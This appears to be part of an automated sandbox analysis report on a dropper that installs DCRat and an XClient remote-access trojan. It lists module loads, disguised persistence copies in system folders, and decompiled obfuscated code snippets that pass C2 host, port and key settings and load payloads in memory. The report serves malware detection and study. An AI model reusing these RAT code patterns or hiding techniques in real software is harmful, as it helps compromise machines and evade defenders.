                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: apphelp.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: version.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: windows.storage.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: wldp.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: profapi.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\d908c538d2e8d0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Multimedia Platform\d908c538d2e8d0
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\7ccfebd9e92364
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\9e8d7a4ca61bd9
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Uninstall Information\OfficeClickToRun.exe
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeDirectory created: C:\Program Files\Uninstall Information\e6c9b481da804f
                      Source: ywXeiXEvP2.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: ywXeiXEvP2.exeStatic file information: File size 3817238 > 1048576
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: ywXeiXEvP2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: ywXeiXEvP2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Result.exe
                      Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: ywXeiXEvP2.exe
                      Source: ywXeiXEvP2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: ywXeiXEvP2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: ywXeiXEvP2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: ywXeiXEvP2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: ywXeiXEvP2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: XClient.exe.1.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: XClient.exe.1.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, g357BcsySpWm2aqpGZs.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, g357BcsySpWm2aqpGZs.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: XClient.exe.1.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: XClient.exe.1.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: XClient.exe.1.dr, Messages.cs.Net Code: Memory
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs.Net Code: ITEJwc17La System.AppDomain.Load(byte[])
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs.Net Code: ITEJwc17La System.Reflection.Assembly.Load(byte[])
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs.Net Code: ITEJwc17La
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Messages.cs.Net Code: Memory
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Messages.cs.Net Code: Memory
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs.Net Code: ITEJwc17La System.AppDomain.Load(byte[])
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs.Net Code: ITEJwc17La System.Reflection.Assembly.Load(byte[])
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs.Net Code: ITEJwc17La
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4904046Jump to behavior
                      Source: ServerWeb.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x365f40
                      Source: DCRatBuild.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x3b9eb6
                      Source: Result.exe.0.drStatic PE information: real checksum: 0x1c302 should be: 0x3e11a9
                      Source: ywXeiXEvP2.exeStatic PE information: real checksum: 0x0 should be: 0x3ade12
                      Source: XClient.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1684f
                      Source: ywXeiXEvP2.exeStatic PE information: section name: .didat
                      Source: ywXeiXEvP2.exeStatic PE information: section name: _RDATA
                      Source: DCRatBuild.exe.1.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EE28C push eax; ret 2_2_008EE2AA
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 2_2_008EED46 push ecx; ret 2_2_008EED59
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFD9B7C00AD pushad ; iretd 3_2_00007FFD9B7C00C1
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9B802BB5 pushad ; retf 8_2_00007FFD9B802C41
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9B802BC2 pushad ; retf 8_2_00007FFD9B802C41
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9B827567 push ebx; iretd 8_2_00007FFD9B82756A
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9BAEB0AB push es; retn 7002h8_2_00007FFD9BAEB519
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9BAE7AFF push cs; ret 8_2_00007FFD9BAE7C1F
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeCode function: 8_2_00007FFD9BAE7B1F push cs; ret 8_2_00007FFD9BAE7C1F
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 37_2_00007FFD9B7C2BB5 pushad ; retf 37_2_00007FFD9B7C2C41
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 37_2_00007FFD9B7C2BC2 pushad ; retf 37_2_00007FFD9B7C2C41
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 38_2_00007FFD9B7C2B90 pushad ; retf 38_2_00007FFD9B7C2C41
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 38_2_00007FFD9B7C2BB5 pushad ; retf 38_2_00007FFD9B7C2C41
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 38_2_00007FFD9B7C2BC2 pushad ; retf 38_2_00007FFD9B7C2C41
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 38_2_00007FFD9B7C71E5 push es; iretd 38_2_00007FFD9B7C71E8
                      Source: C:\Program Files (x86)\jDownloader\config\conhost.exeCode function: 38_2_00007FFD9B7C7DC3 push ds; ret 38_2_00007FFD9B7C7DC4
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802C00 pushad ; retf 41_2_00007FFD9B802C41
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802BB5 pushad ; retf 41_2_00007FFD9B802C41
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B802B58 pushad ; retf 41_2_00007FFD9B802C41
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B8071E5 push es; iretd 41_2_00007FFD9B8071E8
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeCode function: 41_2_00007FFD9B807DC3 push ds; ret 41_2_00007FFD9B807DC4
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, J9jqRkoToht6Axav6f.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'NeRaBUW1ToiQmqY3Rwp', 'cxiZinWj72nVAdcXFtW', 'T56YhrWMh1osaNqOjHR', 'BDYUL8WqNK0k69O2F5E', 'RNK64NWUJi0mjGC8VyL', 'OP10UKWnaks2Z2AOno0'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, TlC0uIJA6jdOfUly0tI.csHigh entropy of concatenated method names: 'sg9', 'wWeT2aUocN', 'gduZMimUvT', 'NsbTJxswQ9', 'As1xPKrNyMaueOxExPs', 'pWD3APreyNI2m78JVuI', 'shknFTrFElF90iBIH8P', 'aRjImNr4RCOIkcgPCHw', 'O4xtRKrZ94mH3hVpF8j', 'hA8HtDrQvG9hgiwankP'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, W4xCsmJwFAc4CDRMHoT.csHigh entropy of concatenated method names: 'KsvmIppiaB', 'Yo0mUc4SBs', 'jH0m3y6rGI', 'OTnmDvIaAB', 'jrnAKc9G447b270KKiT', 'vJ3mXx9C1n90Bua2BQt', 'Ue3DHg9fQhxijGYHUlH', 'iARrC49TL2yxMF6kqyM', 'CxuSBE9t4J44ncF6Uib', 'pnuppE93T9yhSy8suha'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, xWhDIfGh8PApjqkB3ox.csHigh entropy of concatenated method names: 'Ik2tedcZ04', 'Om3ApNxsKqbW3n51uul', 'zdQZgoxBJFAGuUsfbH8', 'NG2iqBxmykD2tUFp9QB', 'avWtdSxyyegeVgngFdY', '_1fi', 'vX7SoIoDFB', '_676', 'IG9', 'mdP'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, z2U5t67BwbnoCjPv4Xh.csHigh entropy of concatenated method names: '_7zt', 'ul0Lbsx9jl', 'uBWLOCSa2v', 'wvvLdoHtGD', 'tCDLNJT1D0', 'ljELcmUEcg', 'pmdLEcOYDb', 'y7k8cLVrPEIuYX3PGjU', 'sdWW35VLZ4kEC7IsFUC', 'la9BpTV93MMxWANCjIr'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, LNcjaT7FXIwmyJicO5F.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, x1G6pPDFtsh863ctT4.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'yqpQNVwx5g8fPmLxMCe', 'RhEWc7wgLklpOhO4MWA', 'qPaFTnw4Pa51WPWJeNe', 'qPVxQowZALaoCFqIoGH', 'R7kOyAwNFpCL1y1lM6L', 'n2PpPYweQZBQ1uhDVeB'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, YbgphxG5g9Jw5XMqvfv.csHigh entropy of concatenated method names: 'Ieg1cRKl0u', '_1kO', '_9v4', '_294', 'B3E1EoZqlq', 'euj', 'WoR1qHBuiF', 'Ly31VcWfEE', 'o87', 'BMo1kEXC9F'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, LA0jeR7ctquxODXu7MJ.csHigh entropy of concatenated method names: 'xeQ7kMVgaWIN9T1cJBo', 'fRvpU0V4ivCGHqAqpL9', 'iuwbFgVZEK2aHwLGsGf', 'meCvnIVEB3HujW43LW7', 'cCZZuYVxrMQSjtJSank'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, zsa8dOGEncbuD7NjZD3.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'fU7kqHZXS8', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, vfjP2WstDoN9mO43WJ.csHigh entropy of concatenated method names: 'TP2yWtDoN', 'IkxFySth9nD3whLt97', 'PBl4e1BjKXOigQKa02', 'CS0eFKTlJVOsvec85V', 'Uq6nQlG74RHq6By2xe', 'IQuS2JCnJ7NsHFCat7', 'usSaTkVf2', 'QblJnL1ll', 'NWk769qq6', 'Xp4RZ0tii'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.csHigh entropy of concatenated method names: 'Bx1JTvsBI3', 'axWJXM5GUp', 'HqOJQDuXeF', 'NatJpQXDBx', 'U7fJhZuoVp', 'j1FJeTfc2c', 'tHLJfWMGkX', 'rCnSXJkHRmil7MaF6wq', 'zDe4lOkryOOR7oWTUJh', 'PTXpl7kLDJsChlQml37'
